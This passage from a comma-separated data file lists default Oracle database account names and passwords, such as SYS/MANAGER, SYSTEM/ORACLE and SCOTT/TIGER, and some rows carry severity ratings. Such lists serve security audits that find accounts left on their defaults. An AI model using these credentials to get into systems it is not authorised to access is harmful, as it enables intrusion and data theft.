corporation,Oracle,,,ASO,ASO,,,\noracle corporation,Oracle,,,ASP,ASP,,,\noracle corporation,Oracle,,,AST,AST,,,\noracle corporation,Oracle,,,ATM,SAMPLEATM,,,\noracle corporation,Oracle,,,AUDIOUSER,AUDIOUSER,,,\noracle corporation,Oracle,,,AURORA$JIS$UTILITY$,INVALID,,,\noracle corporation,Oracle,,,AURORA$ORB$UNAUTHENTICATED,,,,\noracle corporation,Oracle,,,AX,AX,,,\noracle corporation,Oracle,,,AZ,AZ,,,\noracle corporation,Oracle,,,BC4J,BC4J,,,\noracle corporation,Oracle,,,BEN,BEN,,,\noracle corporation,Oracle,,,BIC,BIC,,,\noracle corporation,Oracle,,,BIL,BIL,,,\noracle corporation,Oracle,,,BIM,BIM,,,\noracle corporation,Oracle,,,BIS,BIS,,,\noracle corporation,Oracle,,,BIV,BIV,,,\noracle corporation,Oracle,,,BIX,BIX,,,\noracle corporation,Oracle,,,BLAKE,PAPER,,,\noracle corporation,Oracle,,,BLEWIS,BLEWIS,,,\noracle corporation,Oracle,,,BOM,BOM,,,\noracle corporation,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,,\noracle corporation,Oracle,,,BRUGERNAVN,ADGANGSKODE,,,\noracle corporation,Oracle,,,BRUKERNAVN,PASSWORD,,,\noracle corporation,Oracle,,,BSC,BSC,,,\noracle corporation,Oracle,,,BUG_REPORTS,BUG_REPORTS,,,\noracle corporation,Oracle,,,CALVIN,HOBBES,,,\noracle corporation,Oracle,,,CATALOG,CATALOG,,,\noracle corporation,Oracle,,,CCT,CCT,,,\noracle corporation,Oracle,,,CDEMO82,UNKNOWN,,,\noracle corporation,Oracle,,,CDEMOCOR,CDEMOCOR,,,\noracle corporation,Oracle,,,CDEMORID,CDEMORID,,,\noracle corporation,Oracle,,,CDEMOUCB,CDEMOUCB,,,\noracle corporation,Oracle,,,CDOUGLAS,CDOUGLAS,,,\noracle corporation,Oracle,,,CE,CE,,,\noracle corporation,Oracle,,,CENTRA,CENTRA,,,\noracle corporation,Oracle,,,CENTRAL,CENTRAL,,,\noracle corporation,Oracle,,,CIDS,CIDS,,,\noracle corporation,Oracle,,,CIS,ZWERG,,,\noracle corporation,Oracle,,,CISINFO,ZWERG,,,\noracle corporation,Oracle,,,CLARK,CLOTH,,,\noracle corporation,Oracle,,,CLKANA,,,,\noracle corporation,Oracle,,,CLKRT,,,,\noracle corporation,Oracle,,,CN,CN,,,\noracle corporation,Oracle,,,COMPANY,COMPANY,,,\noracle corporation,Oracle,,,COMPIERE,COMPIERE,,,\noracle corporation,Oracle,,,CQSCHEMAUSER,PASSWORD,,,\noracle corporation,Oracle,,,CQUSERDBUSER,PASSWORD,,,\noracle corporation,Oracle,,,CRP,CRP,,,\noracle corporation,Oracle,,,CS,CS,,,\noracle corporation,Oracle,,,CSC,CSC,,,\noracle corporation,Oracle,,,CSD,CSD,,,\noracle corporation,Oracle,,,CSE,CSE,,,\noracle corporation,Oracle,,,CSF,CSF,,,\noracle corporation,Oracle,,,CSI,CSI,,,\noracle corporation,Oracle,,,CSL,CSL,,,\noracle corporation,Oracle,,,CSMIG,CSMIG,,,\noracle corporation,Oracle,,,CSP,CSP,,,\noracle corporation,Oracle,,,CSR,CSR,,,\noracle corporation,Oracle,,,CSS,CSS,,,\noracle corporation,Oracle,,,CTXDEMO,CTXDEMO,,,\noracle corporation,Oracle,,,CTXSYS,UNKNOWN,,,\noracle corporation,Oracle,,,CUA,CUA,,,\noracle corporation,Oracle,,,CUE,CUE,,,\noracle corporation,Oracle,,,CUF,CUF,,,\noracle corporation,Oracle,,,CUG,CUG,,,\noracle corporation,Oracle,,,CUI,CUI,,,\noracle corporation,Oracle,,,CUN,CUN,,,\noracle corporation,Oracle,,,CUP,CUP,,,\noracle corporation,Oracle,,,CUS,CUS,,,\noracle corporation,Oracle,,,CZ,CZ,,,\noracle corporation,Oracle,,,DATA_SCHEMA,LASKJDF098KSDAF09,,,\noracle corporation,Oracle,,,DBI,MUMBLEFRATZ,,,\noracle corporation,Oracle,,,DBSNMP,DBSNMP,,,\noracle corporation,Oracle,,,DBVISION,DBVISION,,,\noracle corporation,Oracle,,,DCM,,,,\noracle corporation,Oracle,,,DDIC,199220706,,,\noracle corporation,Oracle,,,DEMO,DEMO,,,\noracle corporation,Oracle,,,DEMO8,DEMO8,,,\noracle corporation,Oracle,,,DEMO9,DEMO9,,,\noracle corporation,Oracle,,,DES,DES,,,\noracle corporation,Oracle,,,DES2K,DES2K,,,\noracle corporation,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,,\noracle corporation,Oracle,,,DIANE,PASSWO1,,,\noracle corporation,Oracle,,,DIP,DIP,,,\noracle corporation,Oracle,,,DISCOVERER5,,,,\noracle corporation,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,,\noracle corporation,Oracle,,,DMSYS,DMSYS,,,\noracle corporation,Oracle,,,DPF,DPFPASS,,,\noracle corporation,Oracle,,,DSGATEWAY,,,,\noracle corporation,Oracle,,,DSSYS,DSSYS,,,\noracle corporation,Oracle,,,DTSP,DTSP,,,\noracle corporation,Oracle,,,EAA,EAA,,,\noracle corporation,Oracle,,,EAM,EAM,,,\noracle corporation,Oracle,,,EARLYWATCH,SUPPORT,,,\noracle corporation,Oracle,,,EAST,EAST,,,\noracle corporation,Oracle,,,EC,EC,,,\noracle corporation,Oracle,,,ECX,ECX,,,\noracle corporation,Oracle,,,EJB,EJB,,,\noracle corporation,Oracle,,,EJSADMIN,EJSADMIN,,,\noracle corporation,Oracle,,,EMP,EMP,,,\noracle corporation,Oracle,,,ENG,ENG,,,\noracle corporation,Oracle,,,ENI,ENI,,,\noracle corporation,Oracle,,,ESTOREUSER,ESTORE,,,\noracle corporation,Oracle,,,EVENT,EVENT,,,\noracle corporation,Oracle,,,EVM,EVM,,,\noracle corporation,Oracle,,,EXAMPLE,EXAMPLE,,,\noracle corporation,Oracle,,,EXFSYS,EXFSYS,,,\noracle corporation,Oracle,,,EXTDEMO,EXTDEMO,,,\noracle corporation,Oracle,,,EXTDEMO2,EXTDEMO2,,,\noracle corporation,Oracle,,,FA,FA,,,\noracle corporation,Oracle,,,FEM,FEM,,,\noracle corporation,Oracle,,,FII,FII,,,\noracle corporation,Oracle,,,FINANCE,FINANCE,,,\noracle corporation,Oracle,,,FINPROD,FINPROD,,,\noracle corporation,Oracle,,,FLM,FLM,,,\noracle corporation,Oracle,,,FND,FND,,,\noracle corporation,Oracle,,,FOO,BAR,,,\noracle corporation,Oracle,,,FPT,FPT,,,\noracle corporation,Oracle,,,FRM,FRM,,,\noracle corporation,Oracle,,,FROSTY,SNOWMAN,,,\noracle corporation,Oracle,,,FTE,FTE,,,\noracle corporation,Oracle,,,FV,FV,,,\noracle corporation,Oracle,,,GL,GL,,,\noracle corporation,Oracle,,,GMA,GMA,,,\noracle corporation,Oracle,,,GMD,GMD,,,\noracle corporation,Oracle,,,GME,GME,,,\noracle corporation,Oracle,,,GMF,GMF,,,\noracle corporation,Oracle,,,GMI,GMI,,,\noracle corporation,Oracle,,,GML,GML,,,\noracle corporation,Oracle,,,GMP,GMP,,,\noracle corporation,Oracle,,,GMS,GMS,,,\noracle corporation,Oracle,,,GPFD,GPFD,,,\noracle corporation,Oracle,,,GPLD,GPLD,,,\noracle corporation,Oracle,,,GR,GR,,,\noracle corporation,Oracle,,,HADES,HADES,,,\noracle corporation,Oracle,,,HCPARK,HCPARK,,,\noracle corporation,Oracle,,,HLW,HLW,,,\noracle corporation,Oracle,,,HR,HR,,,\noracle corporation,Oracle,,,HRI,HRI,,,\noracle corporation,Oracle,,,HVST,HVST,,,\noracle corporation,Oracle,,,HXC,HXC,,,\noracle corporation,Oracle,,,HXT,HXT,,,\noracle corporation,Oracle,,,IBA,IBA,,,\noracle corporation,Oracle,,,IBE,IBE,,,\noracle corporation,Oracle,,,IBP,IBP,,,\noracle corporation,Oracle,,,IBU,IBU,,,\noracle corporation,Oracle,,,IBY,IBY,,,\noracle corporation,Oracle,,,ICDBOWN,ICDBOWN,,,\noracle corporation,Oracle,,,ICX,ICX,,,\noracle corporation,Oracle,,,IDEMO_USER,IDEMO_USER,,,\noracle corporation,Oracle,,,IEB,IEB,,,\noracle corporation,Oracle,,,IEC,IEC,,,\noracle corporation,Oracle,,,IEM,IEM,,,\noracle corporation,Oracle,,,IEO,IEO,,,\noracle corporation,Oracle,,,IES,IES,,,\noracle corporation,Oracle,,,IEU,IEU,,,\noracle corporation,Oracle,,,IEX,IEX,,,\noracle corporation,Oracle,,,IFSSYS,IFSSYS,,,\noracle corporation,Oracle,,,IGC,IGC,,,\noracle corporation,Oracle,,,IGF,IGF,,,\noracle corporation,Oracle,,,IGI,IGI,,,\noracle corporation,Oracle,,,IGS,IGS,,,\noracle corporation,Oracle,,,IGW,IGW,,,\noracle corporation,Oracle,,,IMAGEUSER,IMAGEUSER,,,\noracle corporation,Oracle,,,IMC,IMC,,,\noracle corporation,Oracle,,,IMEDIA,IMEDIA,,,\noracle corporation,Oracle,,,IMT,IMT,,,\noracle corporation,Oracle,,,INTERNAL,SYS_STNT,,,\noracle corporation,Oracle,,,INV,INV,,,\noracle corporation,Oracle,,,IPA,IPA,,,\noracle corporation,Oracle,,,IPD,IPD,,,\noracle corporation,Oracle,,,IPLANET,IPLANET,,,\noracle corporation,Oracle,,,ISC,ISC,,,\noracle corporation,Oracle,,,ITG,ITG,,,\noracle corporation,Oracle,,,JA,JA,,,\noracle corporation,Oracle,,,JAKE,PASSWO4,,,\noracle corporation,Oracle,,,JE,JE,,,\noracle corporation,Oracle,,,JG,JG,,,\noracle corporation,Oracle,,,JILL,PASSWO2,,,\noracle corporation,Oracle,,,JL ,JL ,,,\noracle corporation,Oracle,,,JMUSER,JMUSER,,,\noracle corporation,Oracle,,,JOHN,JOHN,,,\noracle corporation,Oracle,,,JONES,STEEL,,,\noracle corporation,Oracle,,,JTF,JTF,,,\noracle corporation,Oracle,,,JTM,JTM,,,\noracle corporation,Oracle,,,JTS,JTS,,,\noracle corporation,Oracle,,,JWARD,AIROPLANE,,,\noracle corporation,Oracle,,,KWALKER,KWALKER,,,\noracle corporation,Oracle,,,L2LDEMO,L2LDEMO,,,\noracle corporation,Oracle,,,LBACSYS,LBACSYS,,,\noracle corporation,Oracle,,,LIBRARIAN,SHELVES,,,\noracle corporation,Oracle,,,MANPROD,MANPROD,,,\noracle corporation,Oracle,,,MARK,PASSWO3,,,\noracle corporation,Oracle,,,MASCARM,MANAGER,,,\noracle corporation,Oracle,,,MASTER,PASSWORD,,,\noracle corporation,Oracle,,,MDDATA,MDDATA,,,\noracle corporation,Oracle,,,MDDEMO,MDDEMO,,,\noracle corporation,Oracle,,,MDDEMO_CLERK,MGR,,,\noracle corporation,Oracle,,,MDDEMO_MGR,MGR,,,\noracle corporation,Oracle,,,MDSYS,MDSYS,,,\noracle corporation,Oracle,,,ME,ME,,,\noracle corporation,Oracle,,,MFG,MFG,,,\noracle corporation,Oracle,,,MGR,MGR,,,\noracle corporation,Oracle,,,MGWUSER,MGWUSER,,,\noracle corporation,Oracle,,,MIGRATE,MIGRATE,,,\noracle corporation,Oracle,,,MILLER,MILLER,,,\noracle corporation,Oracle,,,MMO2,UNKNOWN,,,\noracle corporation,Oracle,,,MODTEST,YES,,,\noracle corporation,Oracle,,,MOREAU,MOREAU,,,\noracle corporation,Oracle,,,MRP,MRP,,,\noracle corporation,Oracle,,,MSC,MSC,,,\noracle corporation,Oracle,,,MSD,MSD,,,\noracle corporation,Oracle,,,MSO,MSO,,,\noracle corporation,Oracle,,,MSR,MSR,,,\noracle corporation,Oracle,,,MTSSYS,MTSSYS,,,\noracle corporation,Oracle,,,MTS_USER,MTS_PASSWORD,,,\noracle corporation,Oracle,,,MWA,MWA,,,\noracle corporation,Oracle,,,MXAGENT,MXAGENT,,,\noracle corporation,Oracle,,,NAMES,NAMES,,,\noracle corporation,Oracle,,,NEOTIX_SYS,NEOTIX_SYS,,,\noracle corporation,Oracle,,,NNEUL,NNEULPASS,,,\noracle corporation,Oracle,,,NOMEUTENTE,PASSWORD,,,\noracle corporation,Oracle,,,NOME_UTILIZADOR,SENHA,,,\noracle corporation,Oracle,,,NOM_UTILISATEUR,MOT_DE_PASSE,,,\noracle corporation,Oracle,,,NUME_UTILIZATOR,PAROL,,,\noracle corporation,Oracle,,,OAIHUB902,,,,\noracle corporation,Oracle,,,OAS_PUBLIC,,,,\noracle corporation,Oracle,,,OCITEST,OCITEST,,,\noracle corporation,Oracle,,,OCM_DB_ADMIN,OCM_DB_ADMIN,,,\noracle corporation,Oracle,,,ODM,ODM,,,\noracle corporation,Oracle,,,ODM_MTR,MTRPW,,,\noracle corporation,Oracle,,,ODS,ODS,,,\noracle corporation,Oracle,,,ODSCOMMON,ODSCOMMON,,,\noracle corporation,Oracle,,,ODS_SERVER,ODS_SERVER,,,\noracle corporation,Oracle,,,OE,OE,,,\noracle corporation,Oracle,,,OEMADM,OEMADM,,,\noracle corporation,Oracle,,,OEMREP,OEMREP,,,\noracle corporation,Oracle,,,OEM_REPOSITORY,,,,\noracle corporation,Oracle,,,OKB,OKB,,,\noracle corporation,Oracle,,,OKC,OKC,,,\noracle corporation,Oracle,,,OKE,OKE,,,\noracle corporation,Oracle,,,OKI,OKI,,,\noracle corporation,Oracle,,,OKO,OKO,,,\noracle corporation,Oracle,,,OKR,OKR,,,\noracle corporation,Oracle,,,OKS,OKS,,,\noracle corporation,Oracle,,,OKX,OKX,,,\noracle corporation,Oracle,,,OLAPDBA,OLAPDBA,,,\noracle corporation,Oracle,,,OLAPSVR,INSTANCE,,,\noracle corporation,Oracle,,,OLAPSYS,MANAGER,,,\noracle corporation,Oracle,,,OMWB_EMULATION,ORACLE,,,\noracle corporation,Oracle,,,ONT,ONT,,,\noracle corporation,Oracle,,,OO,OO,,,\noracle corporation,Oracle,,,OPENSPIRIT,OPENSPIRIT,,,\noracle corporation,Oracle,,,OPI,OPI,,,\noracle corporation,Oracle,,,ORACACHE,,,,\noracle corporation,Oracle,,,ORACLE,ORACLE,,,\noracle corporation,Oracle,,,ORADBA,ORADBAPASS,,,\noracle corporation,Oracle,,,ORANGE,,,,\noracle corporation,Oracle,,,ORAPROBE,ORAPROBE,,,\noracle corporation,Oracle,,,ORAREGSYS,ORAREGSYS,,,\noracle corporation,Oracle,,,ORASSO,ORASSO,,,\noracle corporation,Oracle,,,ORASSO_DS,ORASSO_DS,,,\noracle corporation,Oracle,,,ORASSO_PA,ORASSO_PA,,,\noracle corporation,Oracle,,,ORASSO_PS,ORASSO_PS,,,\noracle corporation,Oracle,,,ORASSO_PUBLIC,ORASSO_PUBLIC,,,\noracle corporation,Oracle,,,ORASTAT,ORASTAT,,,\noracle corporation,Oracle,,,ORCLADMIN,WELCOME,,,\noracle corporation,Oracle,,,ORDCOMMON,ORDCOMMON,,,\noracle corporation,Oracle,,,ORDPLUGINS,ORDPLUGINS,,,\noracle corporation,Oracle,,,ORDSYS,ORDSYS,,,\noracle corporation,Oracle,,,OSE$HTTP$ADMIN,INVALID,,,\noracle corporation,Oracle,,,OSM,OSM,,,\noracle corporation,Oracle,,,OSP22,OSP22,,,\noracle corporation,Oracle,,,OSSAQ_HOST,,,,\noracle corporation,Oracle,,,OSSAQ_PUB,,,,\noracle corporation,Oracle,,,OSSAQ_SUB,,,,\noracle corporation,Oracle,,,OTA,OTA,,,\noracle corporation,Oracle,,,OUTLN,OUTLN,,,\noracle corporation,Oracle,,,OWA,OWA,,,\noracle corporation,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,,\noracle corporation,Oracle,,,OWF_MGR,OWF_MGR,,,\noracle corporation,Oracle,,,OWNER,OWNER,,,\noracle corporation,Oracle,,,OZF,OZF,,,\noracle corporation,Oracle,,,OZP,OZP,,,\noracle corporation,Oracle,,,OZS,OZS,,,\noracle corporation,Oracle,,,PA,PA,,,\noracle corporation,Oracle,,,PANAMA,PANAMA,,,\noracle corporation,Oracle,,,PATROL,PATROL,,,\noracle corporation,Oracle,,,PAUL,PAUL,,,\noracle corporation,Oracle,,,PERFSTAT,PERFSTAT,,,\noracle corporation,Oracle,,,PERSTAT,PERSTAT,,,\noracle corporation,Oracle,,,PJM,PJM,,,\noracle corporation,Oracle,,,PLANNING,PLANNING,,,\noracle corporation,Oracle,,,PLEX,PLEX,,,\noracle corporation,Oracle,,,PLSQL,SUPERSECRET,,,\noracle corporation,Oracle,,,PM,PM,,,\noracle corporation,Oracle,,,PMI,PMI,,,\noracle corporation,Oracle,,,PN,PN,,,\noracle corporation,Oracle,,,PO,PO,,,\noracle corporation,Oracle,,,PO7,PO7,,,\noracle corporation,Oracle,,,PO8,PO8,,,\noracle corporation,Oracle,,,POA,POA,,,\noracle corporation,Oracle,,,POM,POM,,,\noracle corporation,Oracle,,,PORTAL,,,,\noracle corporation,Oracle,,,PORTAL30,PORTAL31,,,\noracle corporation,Oracle,,,PORTAL30_ADMIN,PORTAL30_ADMIN,,,\noracle corporation,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,,\noracle corporation,Oracle,,,PORTAL30_PS,PORTAL30_PS,,,\noracle corporation,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,,\noracle corporation,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,,\noracle corporation,Oracle,,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,,,\noracle corporation,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,,\noracle corporation,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,,\noracle corporation,Oracle,,,PORTAL_APP,,,,\noracle corporation,Oracle,,,PORTAL_DEMO,,,,\noracle corporation,Oracle,,,PORTAL_PUBLIC,,,,\noracle corporation,Oracle,,,PORTAL_SSO_PS,PORTAL_SSO_PS,,,\noracle corporation,Oracle,,,POS,POS,,,\noracle corporation,Oracle,,,POWERCARTUSER,POWERCARTUSER,,,\noracle corporation,Oracle,,,PRIMARY,PRIMARY,,,\noracle corporation,Oracle,,,PSA,PSA,,,\noracle corporation,Oracle,,,PSB,PSB,,,\noracle corporation,Oracle,,,PSP,PSP,,,\noracle corporation,Oracle,,,PUBSUB,PUBSUB,,,\noracle corporation,Oracle,,,PUBSUB1,PUBSUB1,,,\noracle corporation,Oracle,,,PV,PV,,,\noracle corporation,Oracle,,,QA,QA,,,\noracle corporation,Oracle,,,QDBA,QDBA,,,\noracle corporation,Oracle,,,QP,QP,,,\noracle corporation,Oracle,,,QS,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_ADM,UNKNOWN,,,\noracle corporation,Oracle,,,QS_CB,QS_CB,,,\noracle corporation,Oracle,,,QS_CBADM,UNKNOWN,,,\noracle corporation,Oracle,,,QS_CS,UNKNOWN,,,\noracle corporation,Oracle,,,QS_ES,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_OS,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_WS,UNKNOWN,,,\noracle corporation,Oracle,,,RE,RE,,,\noracle corporation,Oracle,,,REPADMIN,REPADMIN,,,\noracle corporation,Oracle,,,REPORTS,REPORTS,,,\noracle corporation,Oracle,,,REPORTS_USER,OEM_TEMP,,,\noracle corporation,Oracle,,,REP_MANAGER,DEMO,,,\noracle corporation,Oracle,,,REP_OWNER,REP_OWNER,,,\noracle corporation,Oracle,,,REP_USER,DEMO,,,\noracle corporation,Oracle,,,RG,RG,,,\noracle corporation,Oracle,,,RHX,RHX,,,\noracle corporation,Oracle,,,RLA,RLA,,,\noracle corporation,Oracle,,,RLM,RLM,,,\noracle corporation,Oracle,,,RMAIL,RMAIL,,,\noracle corporation,Oracle,,,RMAN,RMAN,,,\noracle corporation,Oracle,,,RRS,RRS,,,\noracle corporation,Oracle,,,SAMPLE,SAMPLE,,,\noracle corporation,Oracle,,,SAP,SAPR3,,,\noracle corporation,Oracle,,,SAPR3,SAP,,,\noracle corporation,Oracle,,,SCOTT,TIGGER,,,\noracle corporation,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,,\noracle corporation,Oracle,,,SECDEMO,SECDEMO,,,\noracle corporation,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,,\noracle corporation,Oracle,,,SH,SH,,,\noracle corporation,Oracle,,,SITEMINDER,SITEMINDER,,,\noracle corporation,Oracle,,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,,,\noracle corporation,Oracle,,,SLIDE,SLIDEPW,,,\noracle corporation,Oracle,,,SPIERSON,SPIERSON,,,\noracle corporation,Oracle,,,SSP,SSP,,,\noracle corporation,Oracle,,,STARTER,STARTER,,,\noracle corporation,Oracle,,,STRAT_USER,STRAT_PASSWD,,,\noracle corporation,Oracle,,,SWPRO,SWPRO,,,\noracle corporation,Oracle,,,SWUSER,SWUSER,,,\noracle corporation,Oracle,,,SYMPA,SYMPA,,,\noracle corporation,Oracle,,,SYS,MANAGER,,,\noracle corporation,Oracle,,,SYSADM,SYSADM,,,\noracle corporation,Oracle,,,SYSADMIN,SYSADMIN,,,\noracle corporation,Oracle,,,SYSMAN,OEM_TEMP,,,\noracle corporation,Oracle,,,SYSTEM,ORACLE,,,\noracle corporation,Oracle,,,TAHITI,TAHITI,,,\noracle corporation,Oracle,,,TALBOT,MT6CH5,,,\noracle corporation,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,,\noracle corporation,Oracle,,,TEC,TECTEC,,,\noracle corporation,Oracle,,,TEST,TEST,,,\noracle corporation,Oracle,,,TESTPILOT,TESTPILOT,,,\noracle corporation,Oracle,,,TEST_USER,TEST_USER,,,\noracle corporation,Oracle,,,THINSAMPLE,THINSAMPLEPW,,,\noracle corporation,Oracle,,,TIBCO,TIBCO,,,\noracle corporation,Oracle,,,TIP37,TIP37,,,\noracle corporation,Oracle,,,TRACESVR,TRACE,,,\noracle corporation,Oracle,,,TRAVEL,TRAVEL,,,\noracle corporation,Oracle,,,TSDEV,TSDEV,,,\noracle corporation,Oracle,,,TSUSER,TSUSER,,,\noracle corporation,Oracle,,,TURBINE,TURBINE,,,\noracle corporation,Oracle,,,UDDISYS,,,,\noracle corporation,Oracle,,,ULTIMATE,ULTIMATE,,,\noracle corporation,Oracle,,,UM_ADMIN,UM_ADMIN,,,\noracle corporation,Oracle,,,UM_CLIENT,UM_CLIENT,,,\noracle corporation,Oracle,,,USER,USER,,,\noracle corporation,Oracle,,,USER0,USER0,,,\noracle corporation,Oracle,,,USER1,USER1,,,\noracle corporation,Oracle,,,USER2,USER2,,,\noracle corporation,Oracle,,,USER3,USER3,,,\noracle corporation,Oracle,,,USER4,USER4,,,\noracle corporation,Oracle,,,USER5,USER5,,,\noracle corporation,Oracle,,,USER6,USER6,,,\noracle corporation,Oracle,,,USER7,USER7,,,\noracle corporation,Oracle,,,USER8,USER8,,,\noracle corporation,Oracle,,,USER9,USER9,,,\noracle corporation,Oracle,,,USER_NAME,PASSWORD,,,\noracle corporation,Oracle,,,USUARIO,CLAVE,,,\noracle corporation,Oracle,,,UTILITY,UTILITY,,,\noracle corporation,Oracle,,,UTLBSTATU,UTLESTAT,,,\noracle corporation,Oracle,,,VEA,VEA,,,\noracle corporation,Oracle,,,VEH,VEH,,,\noracle corporation,Oracle,,,VERTEX_LOGIN,VERTEX_LOGIN,,,\noracle corporation,Oracle,,,VIDEOUSER,VIDEOUSER,,,\noracle corporation,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,,\noracle corporation,Oracle,,,VIRUSER,VIRUSER,,,\noracle corporation,Oracle,,,VPD_ADMIN,AKF7D98S2,,,\noracle corporation,Oracle,,,VRR1,UNKNOWN,,,\noracle corporation,Oracle,,,WEBCAL01,WEBCAL01,,,\noracle corporation,Oracle,,,WEBDB,WEBDB,,,\noracle corporation,Oracle,,,WEBREAD,WEBREAD,,,\noracle corporation,Oracle,,,WEBSYS,MANAGER,,,\noracle corporation,Oracle,,,WEBUSER,YOUR_PASS,,,\noracle corporation,Oracle,,,WEST,WEST,,,\noracle corporation,Oracle,,,WFADMIN,WFADMIN,,,\noracle corporation,Oracle,,,WH,WH,,,\noracle corporation,Oracle,,,WIP,WIP,,,\noracle corporation,Oracle,,,WIRELESS,,,,\noracle corporation,Oracle,,,WKADMIN,WKADMIN,,,\noracle corporation,Oracle,,,WKPROXY,UNKNOWN,,,\noracle corporation,Oracle,,,WKSYS,WKSYS,,,\noracle corporation,Oracle,,,WKUSER,WKUSER,,,\noracle corporation,Oracle,,,WK_PROXY,,,,\noracle corporation,Oracle,,,WK_SYS,,,,\noracle corporation,Oracle,,,WK_TEST,WK_TEST,,,\noracle corporation,Oracle,,,WMS,WMS,,,\noracle corporation,Oracle,,,WMSYS,WMSYS,,,\noracle corporation,Oracle,,,WOB,WOB,,,\noracle corporation,Oracle,,,WPS,WPS,,,\noracle corporation,Oracle,,,WSH,WSH,,,\noracle corporation,Oracle,,,WSM,WSM,,,\noracle corporation,Oracle,,,WWW,WWW,,,\noracle corporation,Oracle,,,WWWUSER,WWWUSER,,,\noracle corporation,Oracle,,,XADEMO,XADEMO,,,\noracle corporation,Oracle,,,XDB,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,XDP,XDP,,,\noracle corporation,Oracle,,,XLA,XLA,,,\noracle corporation,Oracle,,,XNC,XNC,,,\noracle corporation,Oracle,,,XNI,XNI,,,\noracle corporation,Oracle,,,XNM,XNM,,,\noracle corporation,Oracle,,,XNP,XNP,,,\noracle corporation,Oracle,,,XNS,XNS,,,\noracle corporation,Oracle,,,XPRT,XPRT,,,\noracle corporation,Oracle,,,XTR,XTR,,,\noracle,7 or later,,,Scott,Tiger,,Any,\noracle,7 or later,,,sys,change_on_install,,,\noracle,7 or later,,,system,manager,,,\noracle,8.1.7,,,,,,,\noracle,8.1.7,,Admin,,,,,\noracle,8.1.7,,Multi,,,Admin,,\noracle,8i,,,internal,oracle,,all,\noracle,8i,,,sys,change_on_install,,8.1.6,\noracle,Database,Any,,#INTERNAL,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,#INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ABM,ABM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ADAMS,WOOD,Threatcon 4 (least serious),,\noracle,Database,Any,,ADLDEMO,ADLDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMIN,JETSPEED,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMIN,WELCOME,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMINISTRATOR,ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMINISTRATOR,ADMINISTRATOR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AHL,AHL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AHM,AHM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AK,AK,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ALHRO,XXX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ALHRW,XXX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ALR,ALR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AMS,AMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,AMV,AMV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ANDY,SWORDFISH,Threatcon 4 (least serious),,\noracle,Database,Any,,ANONYMOUS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ANONYMOUS,ANONYMOUS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ANONYMOUS,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AP,AP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLMGR,APPLMGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,APPLSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,APPS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,FND,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,APPLSYSPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,PUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLYSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLYSYSPUB,PUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPS,APPS,Threatcon 1 (most serious),,\noracle,Database,Any,,APPS_MRC,APPS,Threatcon 1 (most serious),,\noracle,Database,Any,,APPUSER,APPPASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQ,AQ,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQDEMO,AQDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQJAVA,AQJAVA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQUSER,AQUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AR,AR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ASF,ASF,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASG,ASG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASL,ASL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASO,ASO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASP,ASP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AST,AST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ATM,SAMPLEATM,Threatcon 3 (1 is most 